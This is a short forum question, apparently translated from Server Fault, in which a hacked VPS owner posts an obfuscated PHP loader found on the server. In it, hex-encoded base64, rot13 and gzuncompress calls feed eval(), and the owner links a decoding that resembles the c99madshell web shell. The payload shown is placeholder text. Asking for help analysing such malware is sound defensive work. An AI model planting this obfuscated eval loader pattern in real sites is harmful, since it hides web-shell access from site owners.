Hacking

解碼編碼對像數組

  • February 3, 2015

我需要你的幫助..我的 VPS 被黑了..我試圖解碼我找到的文件..這裡是一個 php 文件的內容,它是一組編碼對象。

你能幫助我嗎?http://pastebin.com/eKX22EHx

<?php $array = array('blabla','blablabla','blablabla');$x = implode("", $array);$b64 = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$r13 = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";$gzc = "\x67\x7a\x75\x6e\x63\x6f\x6d\x70\x72\x65\x73\x73";eval($gzc($b64($r13($x))));?>

這裡有解碼的程式碼http://pastebin.com/d2w7AXrK 它似乎類似於 c99madshell http://www.akamai.com/dl/akamai/akamai-security-advisory-web-shells.pdf

引用自:https://serverfault.com/questions/664485